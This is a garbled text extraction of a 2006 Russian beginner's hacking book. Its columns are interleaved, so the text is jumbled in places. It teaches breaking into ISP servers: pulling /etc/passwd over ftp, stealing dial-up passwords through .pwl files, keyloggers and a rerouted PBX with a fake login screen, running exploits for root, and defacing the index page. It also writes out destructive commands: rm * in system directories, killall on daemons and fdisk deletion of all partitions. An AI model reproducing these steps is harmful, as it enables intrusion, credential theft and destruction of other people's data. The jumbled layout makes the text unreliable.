Вы находитесь на странице: 1из 112

Максим Левин УДК 681.

3
ББК 32.973.26018.2
Л363

Левин М.
Л363 Хакинг с самого начала: Методы и
секреты.
М.: Бук
пресс, 2006.
224 с.
Хакинг с самого начала:
Методы и секреты С помощью этой книги Вы поймете как стать начинающим
хакером.

УДК 681.3
ББК 32.973.26018.2

NEED MORE BOOKS ON HACKING, PROGRAMMING AND OTHER COMPUTER TOPICS?

GO HERE: http://www.yosite.ru

Москва

Литературное агентство «Бук


Пресс» © Левин М., 2006
2006 © Бук
пресс,2006
Хакинг с самого начала Хакинг с самого начала


Введение в хакинг ■
Linux
RedHat — для начинающего
пользователя UNIX
■ SlackWare — для более
опытного пользователя UNIX
Начинающему хакеру
■ FreeBSD — для людей, которые
Для начала давайте определимся, кто уже довольно свободно
такой хакер. чувствуют себя в UNIX
Хакер — это человек, который Постоянная дилемма: что лучше
досконально знает организацию сети, Linux или проект BSD (FreeBSD,
операционные системы сети, языки OpenBSD, NetBSD…)? Каждый выбирает
программирования. для себя.
Так же хакер знает, как построены Каждая из них имеет свои
сетевые протоколы (например, TCP/IP). И преимущества и недостатки.
еще очень многое.
А теперь ближе к взлому…
Почему хакеры будут всегда?
Итак, вот список популярных в сети
Ответ прост — потому что все сервисов:
сделанное людьми — может ими же быть
взломано! А так же потому что всегда ■ ftp 21
будут администраторы с именем «ЛАМЕР ■ telnet 23
ДНЯ».
■ smtp 25
Итак начнем…
■ http 80
Для начала вам необходимо найти
дистрибутивы следующих сетевых ОС: ■ pop3 110

3 4
Хакинг с самого начала Хакинг с самого начала

Цифры — это порядковый номер электронная почта проходит через этот


того или иного сервиса. порт. Simple Mail Transfer Protocol —
простой протокол передачи почты.
Итак, все по порядку:
HTTP (80)
FTP (21)
Hyper Text Transfer Protocol —
Наверное, все пользовались FTP,
Протокол передачи гипертекста.
если нет, то все впереди.
Ну, наверное, этот протокол знают
Что такое FTP? File Transfer Protocol
все, кто когда
либо пользовался Internet.
(протокол передачи файла). Так вот, когда
Все web
серверы, все странички (по
вы подключаетесь через FTP на сервер, то
большей части) работают через этот порт.
вы автоматически подключаетесь к порту
Одним словом — все, что вы грузите в
21 и дальше, используя команды,
ваш браузер доставляется к вам через этот
пользуетесь этим сервисом.
порт.
TELNET (23)
Так как этот протокол существует
Это тот порт, через который давно и при этом претерпел мало
происходит большинство взломов (после изменений, то взлом через него
обнаружения ошибки), поэтому многие практически невозможен даже для
провайдеры и серверы с нормальными профессионала! Исключая случаи, когда
администраторами отключают этот порт. программа на web
сервере с «дырами» в
Что можно сделать если вы имеете безопасности.
telnet доступ? Ну, на верное все(!) от POP3 (110)
переформатирования винчестера (на
Через этот порт вы получаете
удаленной машине конечно!) до
электронные сообщения к себе в Mail

изменения ядра системы.


Agent (например, Microsoft Outlook).
SMTP (25)
Вот вы теперь и разбираетесь
Вы, наверное, не раз в жизни (немного) в основных протоколах.
отсылали электронную почту? Так вот, вся
5 6
Хакинг с самого начала Хакинг с самого начала

Так как взломать? Не спешите, не Существует много программ,


все так просто… расшифровывающих этот файл, поэтому я
не советую сразу находить их, потому что
Для данного этапа вашего развития
главное — это списать этот файл, а
как хакера вам необходимо знать основы
расшифровать это уже не проблема.
UNIX систем в целом. Так вот — очень
(ну очень) краткое описание UNIX. Итак, ломаем провайдера!
Первое, что нужно сделать — узнать
Файловая система
реальный IP
адрес.
В отличие от Windows (далее
MUST_DIE), где имена дисков (A, B, C, Делается это очень просто:
D…) и путь к файлу выглядит как: tracert (под UNIX traceroute)
C:\MUST_DIE\die.com w3.cnn.com
и вторая строка — это то что нам
в UNIX существует один основной каталог
нужно…
/, а устройства (такие как CD
ROM)
можно найти в директории (например, Оттуда (из второй строки) берем IP

/cdrom). адрес (IP — уникальный адрес для каждой


машины в сети Internet. Пример
В начале эта система вам покажется 195.55.55.55 (каждое число может быть в
очень странной — нет буквенных диапазоне от 0…255 т.е. 0
255.0
255.0

идентификаторов. Но в итоге это в сотни 255.0


255).
раз удобнее.
Теперь пишем ftp (и после пробела
Далее. пишем этот IP
адрес). Где писать? В MS

Все настройки системы находятся в DOS PROMPT или в сеансе MS


DOS.
каталоге /etc. Файл с паролями (обычно) Теперь (немного подождав) мы
находится в каталоге /etc под именем видим строчку login. Здесь пишем ваш
passwd т.е. полный путь к нему — логин для входа в систему Internet.
/etc/passwd.
Теперь видим строчку Password.

7 8
Хакинг с самого начала Хакинг с самого начала

Здесь пишем ваш пароль для входа в ftp программу (т.е. обычно это директория
Internet. MUST_DIE). Вот и ищите его там, если
нет — то смотрите команду find.
И мы получаем что
то типа вот
этого (честно говоря очень маленькая Как ни жаль, но таких провайдеров
вероятность того, что ваш провайдер все меньше и меньше. Но они
настолько глуп, но с чем черт не шутит! существуют, и, к тому же, появляются
Один популярный сервер w3.dos.net новые!
взломали еще
Не огорчайтесь, если у вас ничего не
проще — подключились к сервису IIS
вышло! Это только начало…
(Internet Information Server), а там вообще
не было пароля! Правило номер один: главное —
стремление и желание найти «дырки», а
Так вот — продолжаем.
так же умение ими воспользоваться.
Видим:
Directory /home/usr/ваш_логин not Как же надо хакать и с чего начать?
found
Logging in "/" Для начала попробуй
Вот и все, считайте, что взлом просканировать несколько IP по разным
окончен. портам. Ты увидишь, что некоторые
компьютеры отвечают, а некоторые нет.
Просто напишите строку: Некоторые компьютеры ответят и только
ftp> (писать здесь) get /etc/passwd некоторые, возможно некоторые из
Вы получили файл с паролями. найденных будут плохо защищенными и
«Куда?» — спросите вы. Это легко узнать, ждать пока ты их взломаешь.
запустив команду find под MUST_DIE и Небольшое отступление: Ты скажешь
искать нужно passwd файл (без что это за фигня такая — порты и прочая
расширения). Обычно он записывается в лабуда? Порт — это адрес определенного
ту директорию, из которой вы запустили сервиса, запущенного на данном

9 10
Хакинг с самого начала Хакинг с самого начала

компьютере в Internet. Также их очень логина/пароля, то сервер через некоторое


часто называют TCP/IP (Transfer Control время пошлет тебя подальше. Если тебе
Protocol/Internet Protocol) порты, так как нечего делать, то можешь попытаться
на них может обратиться другой поперебирать пароли, а когда надоест,
пользователь из Internet.Примером может можешь читать дальше.
служить принтер или модем — они ведь
Если попробовать приконнектиться
тоже обращаются с компьютером через
к серверу не через 23 порт, а через какие

свои порты.
нибудь другие порты, то при большом
Как только человек выходит в везении сервер тебе скажет что ты
Internet, он сразу же получает свой приконнектился удачно и ты сможешь
уникальный IP
адрес (например, ppp1033 легко найти нужную комбинацию. Это
5.dialup.glasnet.ru). После этого любой самый простой способ взламывания
желающий может воспользоваться твоими серверов. Можно проявить себя как
ресурсами (которые доступны) также, как «Белый хакер в шляпе» — посылаешь
и тебе ресурсы других. Для того, чтобы письмо сисадмину и уходишь с этого
воспользоваться услугами, необходимо сервера (типа незаконно и все в таком
указать IP:port (к примеру, 195.34.34.30:21 духе). Ну а если ты никогда не слышал
— для того, чтобы попасть на FTP сервер про
zone.ru). 273
275 статьи УК РФ, то… ну, я думаю,
ты сам догадаешься, что тебе делать…
Теперь ты, возможно,
приконнектишься к какому
нибудь Небольшое отступление: Сервак —
серваку к порту 23 (порт telnet) (Пуск ➪ компьютер, подключенный к Internet.
выполнить ➪ telnet ip:port. Если не Сервис — программа, запущенная на
указывать порт, то по умолчанию это 23 серваке на определенном порту. Каждая
порт). Если ты нормально такая программа должна отвечать на
приконнектишься, то увидишь определенные программы. Если ты дашь
приглашение с просьбой ввести логин и этой программе правильную команду, то
пароль. Но поскольку ты не знаешь она должна что
то сделать для тебя.

11 12
Хакинг с самого начала Хакинг с самого начала

Самый простейший пример — сервис C:\твой_Windows\SERVICES\. В NT это —


«ЭХО» или по другому — генератор C:\WINNT\SYSTEM32\DRIVERS\ETC\SE
символов (порт 19). Если ты RVICES. Ну а в Юниксе это /etc/services/
приконнектишься телнетом по этому (хотя если у тебя стоит Юникс, я думаю
порту к компьютеру, у которого запущен тебе это объяснять не надо). Эти порты
этот сервис, эта программа будет называются хорошо известными, так как
реагировать на любой нажатый тобой они используются для наиболее
символ и будет показывать его в окне распространенных сервисов (WWW, е
mail,
телнета. Все что тебе нужно — FTP, news, telnet). Например, SMTP —
приконнектиться к серваку, на котором отправка почты — 25 порт,
запущен нужный тебе сервис. POP3 — прием почты 110 порт, WWW —
80 порт, FTP — 21…
Другой пример — это сервис поиска
нужного человека в сети (Finger). Если ты Ты можешь быть сбит с толку тем,
задашь этой программе искать какого либо то что существует куча прог для
человека с другого хоста и при этом сканирования всего, чего только возможно
программа finger запущена на сервере, а и хакеры ими очень часто пользуются. Но!
также пользователь не сделал так, чтобы При этом ты можешь нарваться на
его эта программа не находила, то ты неприятности, так как у сисадминов есть
получишь об этом пользователе очень привычка (далеко не лучшая в твою
много полезной инфы. пользу) просматривать логи всех
коннектов и по каким портам, а так же
Какие сервисы запущены, на каких
попытки взлома их сервера. Некоторые
портах и где об этом узнать? Порты
сисадмины свободно разрешают сканить
находятся в диапазоне от 1 до 1024 и
их серверы, а некоторые, увидев что

называются «хорошо известные порты»


нибудь не ладное, сразу откапывают твоего
(well
known). Список использованных
сисадмина и жалуются ему какой ты
портов можно посмотреть в файле на
нехороший (в исключительных случаях это
компьютере, который называется
может окончиться тем, что тебя отключит
«services». В Windows он находится в
из Internet твой пров навсегда!). В США

13 14
Хакинг с самого начала Хакинг с самого начала

сканирование разрешено и сами не нужно или пустой пароль на полный


сисадмины часто сканят друг друга в целях доступ. Из ошибок программ самые
нахождения дырок. Но от греха подальше распространенные — переполнение буфера
если кого
нибудь собираешься сканить из обмена у программ, созданных для
добрых побуждений — лучше попроси Internet. Очень часто это используют для
разрешение или хотя бы уведоми об этом того, чтобы перехватить контроль над
сисадмина. серваком и потом делать с ним все что
твоей душе угодно.
Так что же такое дырки в системах,
о которых столько говорят? Дырка — что
Ну а теперь перейдем к очень
нибудь в системе, которое позволяет кому
известному сейчас виду атак —
нибудь контролировать систему в обход Эксплоитам. Ты уже наверно не раз
сисадмина.Существует очень много типов слышал об этой атаке, но не понимал, что
дырок. Это может быть неправильно это такое и как этим пользоваться. Так
сконфигурированная программа, ошибка в вот. Эксплоит — это программа,
самой программе… Наглядным примером написанная на Си++, использующая
плохо сконфигурированной программы дырки в системе для получения прав рута
может служить старая версия программы (root) — самого главного человека,
sendmail (если сисадмин оставлял команды которому доступно ВСЕ!!! К примеру это
wiz и debug или дал директории так называемая FTP
Bounce дырка,
неправильные права доступа на FTP
заключаемая в том, что FTP
сервер
сервере, то любой желающий мог скачать (служит для скачки/закачки файлов с
файл паролей). В таких случаях вся вина сервера/на сервер) настроен так, чтобы
лежит на сисадминах, так как ошибка переадресовывать запрос пользователя на
допущена при конфигурировании, а не другой компьютер. По идее эта фича
из
за самой программы. вообще на фиг не нужна (в смысле для
сисадминов — нам она как раз таки и
Другой очень известный и
нужна). Это только создает возможность
распространенный баг — расшаривание
взлома, так как эта фича позволяет
ресурсов в Windows когда это совершенно
любому человек просканить порты другого

15 16
Хакинг с самого начала Хакинг с самого начала

компьютера и представиться компьютеру часто вообще меняют прогу, которая


FTP сервером, с которого идет стоит, только оставляют то же имя и
переадресация и этот человек получит номер версии чуть
чуть переделывают.
«ключи от квартиры где деньги лежат». Конечно же все дырки рано или поздно
Вообще эксплоиты наиболее практичные и фиксят и нужно стараться пользоваться
довольно таки легко применяются (если новыми эксплоитами. Ну, а теперь самое
голова с руками растет откуда надо). С главное — как же найти эти дырки?
эксплоитом можно хорошо поиздеваться
Для начала посмотри, что у тебя из
над сисадмином, а также над его системой
сервисов есть на компе — набери команду
(ой — а зачем вот эти файлы — они тут
netstat a (в Пуск ➪ Выполнить) и ты
ва
а
а
аще не нужны!).
увидишь что
то типа этого:
Эксплоит хорош еще тем, что он не Active Connections
ломает систему (сам справишься!), а Proto Local Address
только дает тебе «ключи». Как ты знаешь, Foreign Address State
сейчас серваки стоят как минимум на трех TCP localhost:1027
типах платформ: NT, VMS и UNIX. У них 0.0.0.0:0 LISTENING
куча разных версий и типов — UNIX TCP localhost:135
делится на BSD, AIX, SCI, Sun OS, Irix и 0.0.0.0:0 LISTENING
(наверно) твой любимый Линукс. Ну и TCP localhost:135
конечно же каждая версия глючит по 0.0.0.0:0 LISTENING
разному и поэтому под разные типы и TCP localhost:1026
версии существуют эксплоиты так сказать 0.0.0.0:0 LISTENING
«нужного калибра», ведь как ты TCP localhost:1026
понимаешь эксплоит, сделанный под NT, localhost:1027 ESTABLISHED
не будет пахать под UNIX, а сделанный TCP localhost:1027
для Sun OS не будет пахать под Линукс localhost:1026 ESTABLISHED
(ну, хакеру не проблема переделать TCP localhost:137
эксплоит — на то он и хакер). Ну а разные 0.0.0.0:0 LISTENING
версии не будут пахать, так как очень TCP localhost:138
17 18
Хакинг с самого начала Хакинг с самого начала

0.0.0.0:0 LISTENING Address State


TCP localhost:nbsession TCP localhost:1027
0.0.0.0:0 LISTENING 0.0.0.0:0 LISTENING
UDP localhost:135 *:* TCP localhost:135
UDP localhost:nbname *:* 0.0.0.0:0 LISTENING
UDP localhost:nbdatagram *:* TCP localhost:135
Хммм… вроде ничего интересного. 0.0.0.0:0 LISTENING
Ну начнем разгребать, что это такое TCP localhost:2508
появилось. 0.0.0.0:0 LISTENING
TCP localhost:2509
Мы видим, что у Local Address (твой 0.0.0.0:0 LISTENING
комп) прослушиваются порты 135, 137, 138 TCP localhost:2510
и nbsession (в общем это 139 порт 0.0.0.0:0 LISTENING
прослушивается… можешь написать netstat TCP localhost:2511
an, чтобы увидеть не название портов, а 0.0.0.0:0 LISTENING
их номера. Насчет этих портов можешь не TCP localhost:2514
беспокоиться — это часть Microsoft 0.0.0.0:0 LISTENING
Networking и они нужны для поддержки TCP localhost:1026
LAN (локальной сети). Теперь зайди в 0.0.0.0:0 LISTENING
Internet и топай, допустим на TCP localhost:1026
www.uxx.com, хотя нет, лучше на localhost:1027 ESTABLISHED
www.happyhacker.org. Одновременно TCP localhost:1027
телнеться на какой
нибудь сервак (ну localhost:1026 ESTABLISHED
допустим www.whitehouse.gov). Теперь TCP localhost:137
снова жми 0.0.0.0:0 LISTENING
netstat a и вот что у тебя примерно TCP localhost:138
должно получиться: 0.0.0.0:0 LISTENING
Active Connections TCP localhost:139
Proto Local Address Foreign 0.0.0.0:0 LISTENING

19 20
Хакинг с самого начала Хакинг с самого начала

TCP localhost:2508 пределами этих 1024 портов. Так понятно?


zlliks.505.ORG:80 ESTABLISHED К примеру, браузер может открывать до
TCP localhost:2509 четырех портов — с 2508 по 2511.
zlliks.505.ORG:80 ESTABLISHED
Теперь ты возможно захочешь
TCP localhost:2510
посканить порты друга? Лучший способ
zlliks.505.ORG:80 ESTABLISHED
сделать это и не бояться быть выкинутым
TCP localhost:2511
из Internet своим провайдером — попроси
zlliks.505.ORG:80 ESTABLISHED
друга (подругу) набрать netstat r. Тогда у
TCP localhost:2514
него появится что
то типа:
whitehouse.gov:telnet ESTABLISHED
Теперь посмотрим, что в этот раз за Route Table
лабуду выдало. Те же порты, что и по Active Routes:
началу, вот только добавилось несколько Network Address Netmask Gateway
новых активных портов — 4 коннекта с Address Interface Metric
zllinks.505.ORG по 80 порту и коннект с 0.0.0.0 0.0.0.0
whitehouse.gov телнетом. Это полная 198.59.999.200 198.59.999.200 1
статистика того, что происходит с твоим 127.0.0.0 255.0.0.0
компом и Internet. 127.0.0.1 127.0.0.1
1
Так ты узнал настоящее имя сервака 198.59.999.0 255.255.255.0
www.happyhacker.org (zlliks.505.ORG). По 198.59.999.200 198.59.999.200 1
идее у тебя должен возникнуть вопрос — а 198.59.999.200 255.255.255.255
какого черта есть порты, у которых номера 127.0.0.1 127.0.0.1
больше 1024??? Так вот, если ты помнишь 1
начало главы, то я там говорил, что эти 198.59.999.255 255.255.255.255
порты ждут коннекта к ним. Но вот если 198.59.999.200 198.59.999.200 1
эта программа коннетиться куда
нибудь, 224.0.0.0 224.0.0.0
то ей помимо своего порта еще нужен 198.59.999.200 198.59.999.200 1
какой
нибудь порт для приема 255.255.255.255 255.255.255.255
информации, и этот порт берется за 198.59.999.200 0.0.0.0
21 22
Хакинг с самого начала Хакинг с самого начала

1 mail как UUPC Чернова. А также


Active Connections некоторые туповатые провайдеры все еще
Proto Local Address предоставляют вход в систему как online
Foreign Address State так и offline под одним паролем. Остается
TCP lovelylady:1093 самое простое — переписать файлик init
mack.foo66.com:smtp ESTABLISHED или init1 с каталога \UUPC. Там будет
Gateway Address и Interface покажут прописан как login так и password.
твой реальный IP (ну или IP сервера, если Пользуйтесь им на здоровье. Ho не
ты сидишь через локальную сеть). Учти, забывайте про то, что «жадность фраера
если твой друг сидит в локалке, то прежде сгубила».
10 раз подумай, чем его сканить, а то При более сложном варианте вы
сисадминам очень не нравится, когда запускаете на машину user’a вирус или
какой недохакер (как они считают) прогу резидентную, отслеживающую
пытается их поломать и могут пойти на появление строчки login:. Дальше остается
все меры, лишь бы отомстить и грабать клавиатуру и записать полученное
поразвлечься (иногда самое безобидное — в файл.
синий экран).
Если юзверь относительно
Вообще
то под таким грамотный и не просто умеет качать
распространенным термином, как взлом почту, а работает более «круто» в Netscape,
Internet подразумевают сразу несколько используя SLIP & PPP, то обратите
разных вещей. Во
пеpвых: незаконное внимание — при таком качестве связи, как
подключение к провайдеру и халявные y нашего Совка, связь обрывается
подключения. Как же можно это частенько. Очень редко можно увидеть,
осуществить? Самый простой вариант — чтобы кто
то из них при соединении
украсть чужой пароль. В наше время при набирал логин и пароль вручную. Часто
огромном количестве тупых юзверей сие это все делает скрипт командами transmit
не представляет никакого труда. Так как и им подобными. А все настройки, хитрец,
подавляющее большинство пользователей держит под своим паролем в Windows. Как
пользуется таким популярным пакетом e

23 24
Хакинг с самого начала Хакинг с самого начала

известно, на всякую хитрую жопу… а затем дропнуть линию. После двyх


тpех
находится очень быстрое решение попыток (вдруг он неверный пароль
проблемы: стоит только поискать файлик с введет) верните АТС в нормальное
расширением .pwl. Там Windows хранит состояние. А то прецеденты с
все практически настройки по каждому последующей раздачей слонов и пряников
юзверю. Включая и пароли. Тем паче, что уже бывали.
шифрует она все это примитивным
Если удалось раздобыть login/passwd,
вариантом DES. Ho алгоритм шифрования
то имея пароль с минимальными
в каждом релизе разный. Однако, имея в
пользовательскими привилегиями хочется
руках чужой .pwl файл, создав несколько
получить их гораздо больше. С
своих с именами 1,2,3,4 и аналогичными
минимальными привилегиями получить
паролями, можно проследить интересную
статус root — задача не одного дня. Ho
зависимость, которая и выведет вас к
начинать с чего
то надо. А начнем мы с
желаемому результату.
того, что узнаем, с какой системой имеем
Если на машину юзера доступа нет, дело. В настоящее время провайдеры
то к решению проблемы можно подойти и висят на самых популярных UNIX:
другим путем. Справедливости ради надо FreeBSD, BSDI, SCO open server, Linux.
заметить, что практически лавинная доля Некоторые, правда, используют такую
соединений приходится на телефонные экзотику как NexStep, UnixWare, Solaris,
линии. Дальше — лучше. Наверняка у вас Aix, HP
UX, VAX
ORX5.12. Встречаются
в офисе есть мини
АТС. уникумы, работающие с Xenix. Ho
Перепрограммировать ее, чтобы звонки с несмотря на видимое обилие
данного номера перероучивались на ваш операционных систем, все они имеют
— плевое дело. Осталось только запустить практически одинаковую систему защиты
терминальную программу BBS, в заставке и идентификации пользователей и их
указать заставку вашего провайдера. И ресурсов, которые передавались по
юзер ведь купится! Ha 100%. Введет и наследству от AT&T UNIX с 1971 года.
login, и password. Проверено уже, и не раз. Стандартные средства защиты в UNIX:
Теперь осталось выдать ему кучу ошибок,

25 26
Хакинг с самого начала Хакинг с самого начала

■ защита через пароли; Расшифровкой этого занимаются


программы типа jack,
■ защита файлов;
crackerjack, blob и множество подобных.
■ команды su, newgrp, at, prwarn, Успех напрямую зависит от данной
sadc, pt_chmod; операционной системы. Чтобы успешно
расшифровать passwd, необходимо, как
■ шифрование данных.
минимум, иметь две пары логинов,
Любой пользователь UNIX имеет паролей расшифрованных и
свой пароль, без которого он не может зашифрованных. Напустив на passwd от
включиться в систему, писать/читать Linux 2.1.3 крякалку паролей blob и имея
почту. Практически во всех UNIX пароли пять пар известных паролей, в опытном
находятся в /etc/passwd. Этот файл варианте за 20 минут успешно
содержит информацию о пользователе, его расшифровываются все пароли. Но
пароле и уровне привилегий. проблема в том, что алгоритмы
Дописать в этот файл информацию о шифрования очень улучшаются с каждой
своем login/passwd и уровне привилегий новой версией системы, а в таких
может только root. Ты можешь его только коммерческих UNIX как SCO Open Server
читать. 5 имеется очень навороченные системы
криптования. К примеру, если SCO 3 с
Ho что же мешает уровнем защиты от 1,2,3 сломалась в
переписать/прочитать его и пользоваться течение 3 часов перебора, то 4,5 где
то за
чужими login’ами? Прочитать можно. И с четверо суток, 6 так и не удалось
огорчением увидеть, что не все так в поломать.
жизни просто. Да, там хранится login
пользователя. Ho сам пароль хранится
только в зашифрованном виде. И вместо Что такое exploit?
пароля в лучшем случае увидишь
Exploit — это небольшие
абракадабру типа #@4OFIU`0346`e.
программки, которые помогают вам
взламывать сервер. Эти программки

27 28
Хакинг с самого начала Хакинг с самого начала

разрабатываются для конкретной версии случае он колеблется от


5000 до +5000 с
того или иного сервиса (daemon) на прибавлением +100, т.е. примерно так:

сервере. 5000
4900

4800… 0 100 200… 5000).
Вот списки популярных exploit’ов:
Не удивляйтесь, если все эти шаги
■ ftp — wu
ftp2.42; wu
ftp2.60
не привели к желаемому результату.
■ qpopper Просто скорее всего сервер, который вы
■ пытаетесь атаковать, уже пропатчили…
proftp
Патч (patch) — небольшая прога,
И еще тысячи им подобные.
которая закрывает известные ей «дыры»
Большинство exploit написаны в (bugs) в системе безопасности.
виде openSource (открытый код), а так же
Вот пока и все, что вам нужно знать
на языке программирования С++.
про эксплоит.
Большинство из них требует для
запуска UNIX. Вот простенький пример
использования exploit (после того как вы Что такое root?
его списали и распаковали) UNIX wu
Root — это главная цель всех
ftp2.42 (подразумевается что вы root): взломов. Root — это корень сервера, root
— это суперпользователь (super
user),
#gcc имя файла с окончанием .с который может делать с компьютером все,
#./a.out  имя файла после что ему захочется!
компиляции (если не было ошибок при
ней) Как получить root? Получить root
очень сложно (конечно, если не
Нас спрашивают IP
адрес сервера, учитывать, что есть администраторы —
который мы атакуем и offset — параметр, полные ламера, я порой удивляюсь — за
зависящий от компилятора, что им платят деньги).
использованного при создании сервиса
(демона) на удаленной машине (в данном
29 30
Хакинг с самого начала Хакинг с самого начала

Так что же делать? Вот здесь как раз самые важные настройки сервера), есть
и приходят на помощь известные нам файл ftpusers (в BSDI UNIX), так по
exploit. Кстати, возможно и вы сможете default (умолчанию) root доступ к порту 21
когда
то написать exploit. Что для этого (ftp) запрещен. Вы с помощью редактора
нужно? Много пива, знание C++, блок joe (на удаленной машине) редактируете
сигарет, дни и ночи, проведенные за этот файл и разрешаете root использовать
изучением кода демона. ftp.
Цель (большинства) exploit — в Как? Просто поставьте перед root
remote access (удаленном доступе), т.е. знак #, а затем запишитесь (Ctrl+k, затем
запустив правильно exploit (при условии, x).
что атакуемый сервер не пропатчен против
Пример (вы — root):
него и версии совпадают) вы в
большинстве случаев получите remote #joe /etc/ftpusers
access. В редакторе вставляем перед root
символ #, затем жмем Ctrl+k, а затем x.
Что дальше?
Все, файл изменен, теперь можно
Ну вот, мы забрались в систему
выходить из системы (а то вдруг вас админ
(давайте просто представим это), что же
просечет?).
теперь делать?
Кстати, имея root доступ к серверу,
1. Мы знаем систему (версию,
вы можете изменить пароль к root и даже
название).
отформатировать жесткий диск… Вот было
2. Мы нашли дырку в ней. бы смешно посмотреть на администратора
сервера, который придя на работу (после
3. Мы обязательно продумали, что
большого бодуна) увидит, что жесткий
делать дальше перед взломом.
диск абсолютно чистый!
Так вот, многие взломы в сети
Теперь пишем:
заканчиваются изменением странички.
Значит так: в каталоге /etc (где находятся #ftp ip_address or host_name

31 32
Хакинг с самого начала Хакинг с самого начала

login:  здесь пишем root Результат:


password: здесь пишем пароль! Unix password too weak, please
И вот черт! Мы забыли изменить retype password:
root пароль! (Я нарочно это сделал, чтобы Что это значит?
вы привыкали к возможным ошибкам и
еще раз обратили внимание на Это значит, что UNIX система — не
следующее)… глупый MUST_DIE!
Что делать? Правильно! И запомните навсегда — пароль
Возвращаемся к exploit! Но сначала должен быть типа: Abc04k9834z —
красиво выйдем… неудобно? А придется запомнить это
правило!
Вводим любую комбинацию
символов… Кстати, если вы будете когда
то
подключаться к провайдеру, то выберите
И… примерно такой пароль! Или пароль —
Система пишет: русское слово, напечатанное в режиме
login incorrect английского языка! Например, слово
ЯКРУТ (вместе) — будет выглядеть как
М
да… шанс был 1 из 1.000.000 (если ZRHEN.
не больше), что вы угадаете пароль — это
явно доказывает, что подбор при взломе Но в данном случае можно еще раз
(ручной) практически исключен. ввести 12345 и получим:
А теперь опять exploit… Retype password:  и еще раз пишем
(предположим вы опять зашли в систему, 12345
вы опять root). Просто введите: Все, пароль изменен! Переходим
#passwd опять к FTP.
Получим: #ftp
ftp>open ip_address or host_name
New unix passwd:  здесь пишем
(чтобы не забыть) 12345 (как вы заметили, здесь немного по

33 34
Хакинг с самого начала Хакинг с самого начала

другому написано, но результат не Text Transfer Protocol) и, немного


меняется) подождав, введите что
то типа:
login: root we hack you
password: 12345 В ответ на это вы получите кучу
И вот мы в системе! (Вы не забыли, тэгов, а внизу название и версию сервера
зачем мы здесь? Мы хотели изменить (не правда ли, оригинальный способ?).
WWW страницу!)
Кстати, привыкайте к
Теперь вы можете выходить из ftp оригинальности в своих действиях и к
написав bye: нестандартному подходу, т.к. нет ни
ftp>bye одного общего алгоритма взлома
различных систем. Так же поймите, что
И вот мы вышли из системы.
метод взлома — это своеобразное
Вы спросите — зачем мы столько искусство и каждый изощряется в нем по

мучились с ftp, если мы через него ничего своему!


не изменим?
Вот мы и узнали версию сервера…
А я отвечу — мы тренируемся!
Что же дальше?
Теперь потренируемся с командой
А дальше вот что!
telnet (порт 23), которая соединяет нас с
удаленным сервером. Где находится программа
сервер?
Опять же запускаем exploit и после Это (иногда) довольно просто
удачного входа в систему, пишем: определить: предположим, сервер
#telnet 127.0.0.1 80 называется apache (очень
распространенный web
сервер). Пишем:
127.0.0.1 — это локальный адрес
машины называемый loopback — т.е. #which apache
машина работает сама с собой через этот Получаем:
ip; 80 — это порт протокола HTTP (Hyper /usr/sbin/apachectl

35 36
Хакинг с самого начала Хакинг с самого начала

или И вот мы видим все содержимое


/usr/local/sbin/apachectl сервера (www). Дальше пишем:
Это толком ничего нам не дает, #rm index.htm (index.html)
кроме того, что мы теперь знаем, где Что в итоге удалит главный файл.
находятся файлы конфигурации, в
Пишем:
которых есть строка DocumentRoot
(httpd.conf). Этот файл находится: #joe index.htm (index.html)
/usr/etc/apache Теперь (в редакторе joe) пишем что

то типа:
или
This site hacked by Vasya
/usr/local/etc/apache
Жмем Ctrl+k, а затем x.
Чаще всего (исходя из
вышеописанного) apache DocumentRott Так же в редакторе joe вы можете
(home_dir) находится: написать что угодно.
/www
или Убить «демонов»!
/home/www
Демон — это процесс в UNIX
или системе, который предоставляет вам
/usr/local/www некоторые услуги. Например, в Internet:
Пишем: ■ Ftpd (ftp daemon) port 21
#cd home_dir
■ Telnetd (telnet daemon) port 23
где home_dir — каталог www. Затем
удаляем index.htm или index.html. Как ■ Smtpd (smtp daemon) port 25
узнать какой? ■ Httpd (http daemon) port 80
Пишем: ■ Pop3d (pop3 daemon) port 110
#ls full | more

37 38
Хакинг с самого начала Хакинг с самого начала

Предположим — вы взломали #cd /boot


систему и просто хотите «западлить» ей. #rm *
Тогда (от root’a) пишем: #cd /bin
#killall httpd #rm *
#cd /sbin
И вот результат — web
страница
#rm *
системы не доступна.
#cd /usr/bin
#killall ftpd #rm *
Результат — ftp
сервис недоступен. #cd /usr/sbin
#rm *
Правда, администратор проще
простого запустит все обратно: Эти строки, после выполнения
удалят все жизненно необходимые файлы
Администратор (от root’a): для системы… (кроме /etc, но об этом
#httpd start (если Linux) позже).
#apachectl restart (если FreeBSD и
Будьте аккуратны, т.к. команда rm
некоторые другие ОС с web сервером
находится в одном из каталогов:
apache)
А теперь ftpd: ■ /bin
#ftpd (все очень просто!) ■ /sbin
Как сделать чтобы система вообще ■ /usr/bin
навернулась. Довольно просто. Вот пример
простейшей атаки, цель которой — ■ /usr/sbin
уничтожить информацию на винчестере Если ее удалить, то дальнейшее
атакуемого сервера (от root’a): удаление будет невозможно (с помощью
команды rm конечно). Чтобы этого
#cd / избежать — просто узнайте где эта
#rm * (удаляет все (!) файлы в команда находится:
корневом каталоге) #which rm

39 40
Хакинг с самого начала Хакинг с самого начала

Эта строка выдаст вам директорию, в Теперь жмем w и Еnter.


которой находится команда rm. Удаляйте
Все! Система вообще навернулась!
ее последней.
(Компьютер даже загрузится не сможет!)
Хотите красиво заподлить?
Есть в UNIX команда dd, наверное
Без проблем: самая опасная из всех существующих
#cd /etc (разумеется при неумелом использовании).
#rm * Вот, что я однажды натворил. Работал я
тогда под SlackWare:
Это удалит все настройки системы!
Два винта:
А теперь пишем:
hda1  slack ; hda2  dos ; hdc2
#reboot
 slack
Что в итоге (после сотни сообщений
И вот я пишу (моя проблема была в
об ошибках) перегрузит сервер или просто
том, что DOS, как обычно, переписал
подвиснет его…
MBR (Master Boot Record) и я не мог
Вот и все, система на 100% грузить hdc2 (SlackWare). Вы наверно
неработоспособна… спросите — а разве нельзя грузить UNIX с
дискеты? Конечно можно! Но у меня не
Вы очень злой на этот сервер? Тогда
работал флоп…):
пишем (от root’a):
dd /dev/hda /dev/hdc 0 512
#fdisk
А теперь по
русски:
Затем вводим p (это выведет нам все
разделы винчестера. А теперь (например, Копируем первые 512 байт с одного
если разделов 4), пишем: винта на другой. Что в этих 512 байтах?
d (enter), 4 (enter) Master Boot Record (MBR). Значит я
d (enter), 3 (enter) нечаянно нажал не «ту» кнопку и… ничего
d (enter), 2 (enter) не произошло…
